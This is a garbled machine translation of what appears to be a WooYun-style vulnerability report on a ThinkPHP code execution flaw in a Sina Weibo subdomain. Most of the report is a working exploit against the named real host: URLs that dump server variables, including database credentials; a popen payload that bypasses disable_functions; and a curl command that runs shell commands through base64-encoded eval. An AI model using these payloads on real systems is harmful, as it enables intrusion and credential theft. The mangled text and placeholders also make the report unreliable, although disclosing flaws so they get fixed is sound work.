Arbitrary Code Execution Vulnerability on Sina Weibo + breakthrough restrictions using shell + possibly penetrating other actions

Sina Weibo has an arbitrary code execution vulnerability, but the server has some disable_function restrictions. Unfortunately, this vulnerability is too rough, causing bypassing and rebounding the Server shell and further penetration attacks.
Detailed Description: Thinkphp patches have been analyzed by the wooyun platform, and I read them myself. They worship the vulnerability discoverers. At the same time, wofeiwo's outstanding analysis is also refreshing, and it is wet.
 
This vulnerability slowed down due to work reasons. I went to the official success stories and looked at it. I did not expect to see an application on Sina Weibo using this framework.
 
Http://tan.weibo.com/h/1/236/aaa/%%7b@print_r ($ _ SERVER) % 7D
 
The $ _ SERVER variable on the SERVER is read, and the database address and password even exist ..
 
I wanted to execute a command to submit wooyun, but disable_functions
 
Http://tan.weibo.com/h/1/236/aaa/%%7b@print (get_%_var ('Disable _ functions ') % 7D
Return Value:
 
Phpinfo, system, exec, shell_exec, passthru, proc_open, proc_close, show_source
Haha, it's a little weak. There are many ways to break through. Here we use popen to make an exploit.
 
Error_reporting (E_ALL); $ handle = popen ('/bin/sh-C '. "'$ _ POST [x]'". '2> & 1', 'R'); echo "'$ handle ';". gettype ($ handle ). "\ n"; $ read = fread ($ handle, 2096); echo $ read; pclose ($ handle); die ();
The reason why POST is used is that the URI value of the framework is not valid.
 
This place does not process single quotes, which is more convenient, but some code in the poc will interfere with the value, so encode
 
Curl "http://tan.weibo.com/h/1/236/aaa/%%7b@eval (base64_decode ('zookeeper ') % 7D"-d "x = ls"
'Resource id # 33'; Resource
Api
Conf
Data
Lib
Public
ThinkPHP
Tpl
Api. php
Co. php
Db
Favicon. ico
Index. php
Oauthcallback. php
PictureDownLoad. php
Ssocallback. php
System
T. php
Hey.
 
Because of access permissions, you can access all the source code on this server.
 
 
Because it is A server group, the Command executed may be a, B, and C .. Now you can execute the command and directly play the shell.
Proof of vulnerability:






 
 
Solution: solution:
Https://code.google.com/p/thinkphp/source/detail? Spec = svn2904 & r = 2838
 
Analysis of ThinkPHP vulnerability: http://www.bkjia.com/Article/201204/126822.html

Author milk Tank